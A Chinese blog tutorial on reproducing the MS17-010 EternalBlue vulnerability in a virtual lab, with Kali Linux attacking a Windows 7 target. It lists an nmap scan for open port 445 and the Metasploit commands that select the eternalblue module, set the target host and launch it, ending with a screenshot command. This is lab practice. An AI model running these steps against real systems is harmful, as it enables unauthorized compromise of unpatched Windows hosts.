使用kali进行漏洞复现【虚拟机测试】

活动线报侠 程序猿

时间: 2023-07-13 阅读: 1 字数:1024

{}
配置需求: 1、攻击机:Kali Linux (IP:...

目录

配置需求: 1、攻击机:Kali Linux (IP:192.168.1.100) 2、目标靶机:Winodws7 3、同一局域网 关于局域网的解释:我解释一下,我们这里很多都是测试都是基于内网,局域网,是这样一个情况,你如果想互通,那就一种情况,一种就是建立公网,一种叫做内网穿透。如果新手建议先学逻辑,至于内网穿透,后面再研究。公网这个东西,现在别想,大部分做法都是内网穿透。 我们在扫描设备的时候,因为你进入的是msf像这种,如果你在扫描失败,就先初始化一下。 nmap -sS -Pn 网段/24 或者说db_nmap 在msf里面执行的 我们主要看开放的445端口 假设看到IP地址为192.168.1.6的主机,开启了445端口(open),找到目标靶机后就可以进行第二个步骤 这里注意:有一种可能,对方开启了防火墙,其实最主要不是防火墙,是公网,那个不是让你选择网络么,家庭网络,工作网络,还有公网,那个公网,相对严格,因此啊,那个一定情况下,你关闭了防火墙,你也没用。有这么一种情况。 第一步指令 sudo su msfconsole search ms17-010 老生长谈输入指令 use exploit/windows/smb/ms17_010_eternalblue 攻击模块 show opctions 查看参数 set rhosts 192.168.1.6 最后输入run或者exploit进行攻击 screenshot 关于ip,这个以你们的虚拟主机,为主,跟我的没有关系,另外注意,你们的选择的NAT就NAT桥接就桥接,一定要两台主机支持互相通信。 ![描述](http://cdn.u1.huluxia.com/g4/M02/B6/F1/rBAAdmSviZWAP1G2AAGaBHoX978073.jpg) ![描述](http://cdn.u1.huluxia.com/g4/M02/B6/F1/rBAAdmSviZWATNs6AAFIDcgnNes481.jpg) ![描述](http://cdn.u1.huluxia.com/g4/M02/B6/F1/rBAAdmSviZaAbJfVAAHAiYzCVMk154.jpg) ![描述](http://cdn.u1.huluxia.com/g4/M02/B6/F1/rBAAdmSviZaAdiQ3AAHvCneZvIs313.jpg)
本文章网址:https://www.sjxi.cn/detil/52684442

打赏作者

本站为非盈利网站,如果您喜欢这篇文章,欢迎支持我们继续运营!

最新评论
当前未登陆哦
登陆后才可评论哦

湘ICP备2021009447号

×

(穷逼博主)在线接单

QQ: 1164453243

邮箱: abcdsjx@126.com

前端项目代做
前后端分离
Python 爬虫脚本
Java 后台开发
各种脚本编写
服务器搭建
个人博客搭建
Web 应用开发
Chrome 插件编写
Bug 修复